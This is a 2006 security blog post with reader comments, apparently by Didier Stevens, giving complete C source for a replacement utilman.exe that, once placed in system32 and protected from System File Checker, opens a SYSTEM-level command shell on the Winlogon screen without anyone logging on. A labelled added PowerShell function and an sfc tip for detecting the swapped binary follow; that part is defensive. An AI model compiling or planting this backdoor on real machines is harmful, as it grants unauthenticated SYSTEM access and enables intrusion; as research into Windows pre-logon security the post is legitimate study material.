Comments posted by evilbitz on my Playing with utilman.exe post gave me a great idea for another experiment with utilman.exe:
You can compile the following example with Borland’s free C++ 5.5 compiler.
Fourth experiment
Compile this simple C program, name it utilman.exe and put it in the system32 directory:
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <tchar.h>

int _tmain(void)
{
    STARTUPINFO s;
    PROCESS_INFORMATION p;
    /* CreateProcess may modify the command-line buffer, so pass a writable copy. */
    LPTSTR szCmdline = _tcsdup(TEXT("CMD"));
    /* Target desktop "WinSta0\Winlogon" (a single backslash in the actual string):
       the desktop Winlogon shows before anyone is logged on. */
    LPTSTR szDesktop = _tcsdup(TEXT("WinSta0\\Winlogon"));

    ZeroMemory(&s, sizeof(s));
    s.cb = sizeof(s);
    s.lpDesktop = szDesktop;   /* start the new process on that desktop */
    ZeroMemory(&p, sizeof(p));

    if (!CreateProcess(NULL, szCmdline, NULL, NULL, FALSE, CREATE_NEW_CONSOLE,
                       NULL, NULL, &s, &p))
    {
        _tprintf(TEXT("CreateProcess failed, error %lu\n"), GetLastError());
        free(szCmdline);
        free(szDesktop);
        return 1;
    }
    /* We do not wait for cmd.exe; release our handles and let it run. */
    CloseHandle(p.hProcess);
    CloseHandle(p.hThread);
    free(szCmdline);
    free(szDesktop);
    return 0;
}
Whenever you press the magic key sequence (Windows Logo key + U), a command shell opens on the Winlogon desktop. And you don’t have to be logged on to do this.
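The experiment depends on the utilman.exe in system32 (and, on systems that have it, dllcache) being a replacement binary rather than the one Microsoft shipped. The following PowerShell check is an added example, not part of the original post: it reports the Authenticode status, signer, company name and SHA-256 of each copy so an administrator can spot a swapped-in build. The paths and the heuristics (unsigned file, or signer and company not Microsoft) are this example’s own assumptions.

```powershell
# Added example, not from the original post: check whether the utilman.exe
# on disk is still the Microsoft-signed binary. utilman.exe is launched by
# Winlogon before logon, so a replaced copy runs with SYSTEM rights.
function Test-UtilmanIntegrity {
    param(
        # Locations to inspect (assumption); dllcache only exists on XP/2003-era systems.
        [string[]]$Path = @(
            "$env:SystemRoot\System32\utilman.exe",
            "$env:SystemRoot\System32\dllcache\utilman.exe"
        )
    )

    foreach ($p in $Path) {
        if (-not (Test-Path -LiteralPath $p)) {
            [pscustomobject]@{
                Path = $p; Present = $false; Status = 'missing'
                Signer = $null; Company = $null; SHA256 = $null; Suspicious = $null
            }
            continue
        }

        $sig    = Get-AuthenticodeSignature -FilePath $p
        $hash   = (Get-FileHash -LiteralPath $p -Algorithm SHA256).Hash
        $info   = (Get-Item -LiteralPath $p).VersionInfo
        $signer = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { $null }

        # Heuristic (assumption): a genuine copy validates (directly or through a
        # catalog) and carries Microsoft version info; a freshly compiled
        # replacement is typically NotSigned with empty version fields.
        $suspicious = ($sig.Status -ne 'Valid') -or
                      ($signer -notlike '*Microsoft*') -or
                      ($info.CompanyName -notlike '*Microsoft*')

        [pscustomobject]@{
            Path       = $p
            Present    = $true
            Status     = $sig.Status
            Signer     = $signer
            Company    = $info.CompanyName
            SHA256     = $hash
            Suspicious = $suspicious
        }
    }
}

Test-UtilmanIntegrity | Format-Table -AutoSize
```

On older Windows versions, catalog-signed system files can report NotSigned even when genuine, so treat the signature column as a prompt to compare the SHA-256 against a known-good copy (install media or another patched machine at the same level) rather than as proof by itself. On Vista and later, `sfc /verifyfile=C:\Windows\System32\utilman.exe` performs the same resource-protection check the post’s comments describe SFC doing interactively.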
What user account does the shell run as? If it is system then there is a huge security hole.
Comment by Jay — Friday 1 September 2006 @ 14:14
It’s the SYSTEM account, read this: http://didierstevens.wordpress.com/2006/08/21/playing-with-utilmanexe/
Comment by Didier Stevens — Friday 1 September 2006 @ 16:28
It doesn’t matter on which desktop the cmd runs.
utilman.exe always runs as SYSTEM.
Nice man
Comment by evilbitz — Friday 1 September 2006 @ 20:00
[...] For a demo of My second playdate with utilman.exe, go here on YouTube. [...]
Pingback by Playing with utilman.exe, The Motion Picture « Didier Stevens — Tuesday 5 September 2006 @ 10:00
Hi, I compiled your script with no error, replaced it in dllcache and system32, blocked SFC when prompted to restore, but when I press “Windows key” + U, nothing. Your scripts in the 3 examples work, but not the last one with CMD.
Comment by Jacky — Wednesday 16 April 2008 @ 13:56